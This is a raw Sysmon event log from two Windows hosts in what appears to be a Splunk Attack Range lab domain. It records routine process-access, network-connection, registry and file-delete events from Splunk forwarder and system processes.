10341000x800000000000000080870Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080869Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080868Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080867Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080866Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080865Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B198-615A-3201-00000000FD01}1060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080864Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.571{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B198-615A-3201-00000000FD01}1060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080863Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:36.572{2FDD8D40-B198-615A-3201-00000000FD01}1060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000102955Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:34.342{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49482-false10.0.1.12-8000- 13241300x8000000000000000102954Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:47:36.076{58E9C193-ACA7-615A-1400-00000000FC01}940C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f4-0x18f20f7e) 23542300x800000000000000080880Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:37.837{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0BFC4D4A8E4225DCE4365C0793AC87D,SHA256=AE3F5FEB3E77B78C3FE6178387F26BDF99A58739BD13DD591A266DA56815D506,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102957Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:37.295{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7DA7C62E891308E0E611CBADAF1F5B8,SHA256=BD420060DF559ED62B38D28E4A0667EFAF09FDB08E095D79D3E02994FD1D3818,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080881Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:38.852{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74D0D9B14993455B851BE5D82A64F9ED,SHA256=512C554401699266C8E5F692319F558B7A0AE81B6804D32E417C43CBB47FE12E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102958Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:38.310{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC7B61BF01E7E96FF3428B99ABEA96AD,SHA256=41B02DBFA3A234229D80016F602781741E792C0BE6346A18B4C6B579ACD683E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080882Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:39.852{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C5380B8E1593C192E2E2A5F230F2BAA,SHA256=11A81AB21726CD7EC50BA01D3499979CDC7E0EEE4F6BB49537A276F7865AC247,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102959Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:39.342{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=534B6DF5CA1017B7016D99C10601910D,SHA256=F32EA6E049470DE652271146CD6E4A6C44D70B1C7661EC40CA6446DC0ECB355B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080884Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:40.853{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49B004CAE66AD14D5C428098D521BDB2,SHA256=A493FA1889540A6848D68A4A8611272B6E8A921520453A846225A4D930933751,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102960Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:40.342{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97D6F769D54D260A6107C7F1360AED97,SHA256=F3BCBD3894010FF92AB3AA570F995BA749B8EFF40C31C249C475953B7943DDE0,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000080883Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:47:40.196{2FDD8D40-AC9A-615A-1000-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f4-0x1b66bdb6) 23542300x800000000000000080885Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:41.884{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD68E343CACD3E234C08C7BC13EE38D2,SHA256=91B55B7A4D4D83AA458D82E4CBA650ECE6FEF626020399D34B76C15C8BB19853,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102962Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:41.357{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E763C6189AE05388455DEC1C70CB61FD,SHA256=96C3BBCEF7A79F29AD8EF26D95081057C21161B624E934303FB93CBCF6BF12BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102961Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:39.356{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49483-false10.0.1.12-8000- 23542300x800000000000000080886Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:42.947{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23DA4A98ECC74D39D07AEF1F085053B5,SHA256=5281AC12278D269E47D3F1926359BF6F30F145D273679BD9C19E5C304059D7D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102963Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:42.357{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=202725D4F39A6A7B7C85C609F90C23DE,SHA256=7AD917DB8DBCC88A848133E47E625C27079C9B7A23B3AFC72A5EAC2E856593A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102964Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:43.373{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6771D75E56B1BA84E5455360D24D558B,SHA256=CEFAD53F6B5B910F8B24C4EB58098A4D8B0B78CBA832154C81CD67E8A5A52E03,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080887Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:40.670{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49989-false10.0.1.12-8000- 23542300x8000000000000000102965Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:44.373{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01590C0A9645C9BB6A7850CC20943AF3,SHA256=02636B6196469F18B325015ECF02904E81DA440DE2E203A4C88A2833F536D310,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080888Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:44.181{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=705B15FF6566417FE323142518EA9406,SHA256=2E4379A4A03FBA0681C84532942ABD4CC82B0E3F505867D6D9C062589853BDD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102966Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:45.373{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8783E1D257183F841C32042C3A2D31D5,SHA256=B901724DF929B420FF7A3696647AEC9F58F90F63BBA63319A0643EB639B5D596,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080889Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:45.212{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A0FEE99E8F6AF2D5B7C60D5107A2476,SHA256=780406100BF16A70A14525E1553481459108C77A0A6701A9205E2A282A22D1AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102968Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:46.388{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE70C217983DE9F2A7EC3B1C0F1D91E,SHA256=98DB3E2B6748F0560744851BDB8B01122217256849407CD1C8A4BDC57C62A7EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080890Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:46.290{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA4795E7408B9B2624EAB58051D4715,SHA256=06E5521E96D59CBF4FAEC793E6A20DCC80F0A31CC4CCFB04A42F549ACD7B3CA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000102967Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:44.387{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49484-false10.0.1.12-8000- 23542300x8000000000000000102969Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:47.404{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0809041CF36646F39967E55A4061D43E,SHA256=89C78EE0AC37D4228569FFDFB571148F5EE29737B528A8DBCED2B1C94DBFB6FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080891Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:47.353{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA851C8B8251A078964A736DA1962ED,SHA256=6A959501D7A201D63E90E5B37B5ED12F7D2094C15470BB73E5212D6FDCC8423C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080893Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:46.671{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49990-false10.0.1.12-8000- 23542300x800000000000000080892Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:48.384{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0AFE1594013F5207307E17F0EDC1081,SHA256=A3AE31FC96C05EA9357CFA601B7DE15772EC132DBF887D235DC35ADBA2E7C64C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102970Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:48.404{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=188401B455B74A742890B6A45B949A84,SHA256=61946D0F7510D397B9F806D75D49EDED54E0C04984E389C4748EED3ABA717748,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080894Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:49.493{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4092741713324187BACDF3CF10591034,SHA256=F4AC2693FA1C7201BE589CC38A7678BD0924779AC2CA3AAF2FCFC0D911B3D00F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102971Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:49.404{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECC3B5BCE271128734C3E0FEA7B61CEA,SHA256=EA149508DEE89B526BB32FA8981B640F38FD3F6CCA1B7782CF6C16F689A0B18D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080895Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:50.650{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EABA7EAC1CA02E4EBE710B7516648ACA,SHA256=00228CA26F83E609B98E3C0FBBA02B7A9AD683D76A413BD49A79D762E1300779,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102972Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:50.404{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=144E1DD74D89268FA5243DFE73A97B8A,SHA256=3EFF26B8CFAD04A51931805D53E15E10A9CF41014F862529CA389A225BC08005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080896Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:51.651{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A26309968B9F295B84D00D478400CEBB,SHA256=AD4CD57C838CF008ACC28CC3C5E41EF183C749DF7447296B1DA020554A4F043C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102973Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:51.404{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75865F53790410CDD31C8DDD5F8D8670,SHA256=46487BBCC86C4465404B1E41A4958AD7102F35818D2ED3101CBC281DE662666E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102976Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:52.404{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C8F90802B88D33648CE76A65DFA92F5,SHA256=7646B1009A8D2B1D66D6BFE8ACE033A567E2545F5340AE6C140B74EAC6444C05,IMPHASH=00000000000000000000000000000000falsetrue 